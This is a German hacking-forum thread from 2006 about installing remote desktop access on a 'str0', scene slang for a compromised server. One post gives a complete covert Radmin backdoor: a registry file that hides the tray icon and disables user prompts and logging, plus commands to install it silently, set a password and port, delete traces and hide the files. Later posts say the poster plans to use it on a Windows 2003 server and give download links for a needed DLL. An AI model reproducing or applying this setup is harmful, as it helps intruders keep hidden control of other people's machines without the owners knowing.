vnc o.ä. auf str0 installieren? geht das?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von birdhouse, 14. Oktober 2006 .

Schlagworte:
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 14. Oktober 2006
    wollte mal wissen ob man vnc oder sowas auf einen str0 istallieren kann
    wenn ja wie
    ich hab bei google gesucht doch nix gefunden
    sufu hat mir auch nich geholfen
    is unix
    bitte helft mir
    MFG
     

  2. Anzeige
  3. #2 15. Oktober 2006
    AW: vnc o.ä. auf str0 installieren? geht das?

    mit radmin gehts sehr einfach:


    beötigt werden
    r_server.exe
    raddrv.dll
    admdll.dll
    und eine reg datei

    regdatei: (settings.reg)
    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\NtUsers]
    "1"=hex:
    
    [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
    "NTAuthEnabled"=hex:00,00,00,00
    "Parameter"=hex:e3,24,49,41,79,4f,31,c1,6f,23,bd,b0,cb,36,2d,bc
    "Port"=hex:c1,11,00,00
    "Timeout"=hex:0a,00,00,00
    "EnableLogFile"=hex:00,00,00,00
    "LogFilePath"="c:\\logfile.txt"
    "FilterIp"=hex:00,00,00,00
    "DisableTrayIcon"=hex:01,00,00,00
    "AutoAllow"=hex:00,00,00,00
    "AskUser"=hex:00,00,00,00
    "EnableEventLog"=hex:00,00,00,00
    "Disables beep"=hex:01,00,00,00
    

    commands:
    Code:
    net stop r_Server
    regedit.exe /s settings.reg
    radmin.exe /install /silence
    radmin.exe /pass:DEIN PASS /port:DEIN PORT /save /silence
    radmin.exe /start 
    del /q settings.reg
    attrib +h +s +a +r radmin.exe
    attrib +h +s +a +r raddrv.dll
    attrib +h +s +a +r admdll.dll
     
  4. #3 15. Oktober 2006
    AW: vnc o.ä. auf str0 installieren? geht das?

    sorry das ich mich jetz einfach so zu wort mlede ohne zu wissen wie, aber die oben gepostete mehtode wird wohl eher nicht funktionieren;
    .. und soweit ich mich erinnern kann mag unix keine exen..
    und ich denke schon das du auf einem stro mit exec rechten auch vnc zum laufen kriegn wirst.. Faule user xD

    Ich hoffe ich kann das ganze hier ein bisschen ankurbeln,
    mfg

    My-Doom
     
  5. #4 15. Oktober 2006
    AW: vnc o.ä. auf str0 installieren? geht das?

    hoi,

    japps auf nem unix server nutzt dir das nix was h4rdc0re gesagt hat... aba kleiner tipp.. ich frag mich, wie du zu dem stro gekommen bist.. du hast ihn ganz bestimmt nicht selber gehackt, weil du sonst wüsstest, wie du vnc oder ähnliches dort installieren musst.. also von daher lass die finger davon.. is besser für dich..

    mfg
     
  6. #5 15. Oktober 2006
    AW: vnc o.ä. auf str0 installieren? geht das?

    Wenn das ein richtiger Unix sever ist dann wird da wohl kaum einene Benutzeroberfläche drauf sein.
    SSH wird wohl das einzige sein was du da nutzen kannst... Reicht bei linux aber voll und ganz!

    MfG

    rezzer
     
  7. #6 15. Oktober 2006
    AW: vnc o.ä. auf str0 installieren? geht das?

    SSH das einzige ? Nene .. jeder zugriff auf systemfunktionen reicht da, sogar mit ner PHP-Shell.

    Zum Thema VNC:
    Home » Linux-Magazin
    bei "VNC-Server unter Linux" ;)

    FlowFlo
     
  8. #7 15. Oktober 2006
    AW: vnc o.ä. auf str0 installieren? geht das?

    Naja also ich würde es schon via SSH machen natürlich kannst du das system auch über andere wege steuern. Doch server haben wie von mir schon erwähnt selten einen X Server oder etwas ähnliches das heisst.. kein VNC möglich. Mann kann unter linux via shell genauso oder sogar mehr dinge machen als via Benutzeroberfläche! Daher ist es eigendlich schwachsin VNC einzu setzen es sei denn du möchtest jemandem helfen und ihm etwas zeigen oder ähnliches. Jeder wie er will doch ich finde es unsinnig ;)

    MfG

    rezzer
     
  9. #8 15. Oktober 2006
    AW: vnc o.ä. auf str0 installieren? geht das?

    Natürlich kann man über die Shell mehr machen als über die Benuitzeroberfläche, aber danach war ja hier nicht gefragt. Ob sowas mit VNC sinn macht will ich garnicht erleutern :p

    FlowFlo
     
  10. #9 15. Oktober 2006
    AW: vnc o.ä. auf str0 installieren? geht das?

    hatte das mit dem unix überlesen.
     
  11. #10 17. Oktober 2006
    AW: vnc o.ä. auf str0 installieren? geht das?

    hätt dar mal noch ne frage zu radmin!

    Ich hab
    r_server.exe
    raddrv.dll
    sind ja beim radmin download dabei

    admdll.dll -> wo bekomme ich die her bzw kann es sein das die bei der V2.2 nicht gebraucht wird?

    reg-Datei -> reicht es den Code in ne neue settings.reg zu kopiere oder muss dar noch was dazu?

    hab vor das ganze auf nem Win 2003 str0 auszuprobieren, bin aber noch ziemlicher newbie. Hab auch schon nach tuts gegooglet aber nix brauchbares gefunden.
     
  12. #11 17. Oktober 2006
    AW: vnc o.ä. auf str0 installieren? geht das?

    admdll.dll bei google in null komma nix gefunden:
    http://www.wolffelaar.nl/~jeroen/Radmin/AdmDll.dll oder
    http://jaja.kn.vutbr.cz/~hladik/AdmDll.dll oder
    http://huizen.deds.nl/~bobochan/AdmDll.dll oder
    ...

    reg-datei: einfach das gepostete in ne .reg datei, fertig!

    den rest hat hardcore bereits erklärt.

    greets
     

  13. Videos zum Thema
Die Seite wird geladen...
Similar Threads - vnc str0 installieren
  1. Antworten:
    3
    Aufrufe:
    975
  2. Antworten:
    0
    Aufrufe:
    744
  3. UVNC - PcHelpWare

    Blackb!rd , 14. November 2011 , im Forum: Netzwerk, Telefon, Internet
    Antworten:
    4
    Aufrufe:
    725
  4. Antworten:
    5
    Aufrufe:
    2.275
  5. Antworten:
    2
    Aufrufe:
    918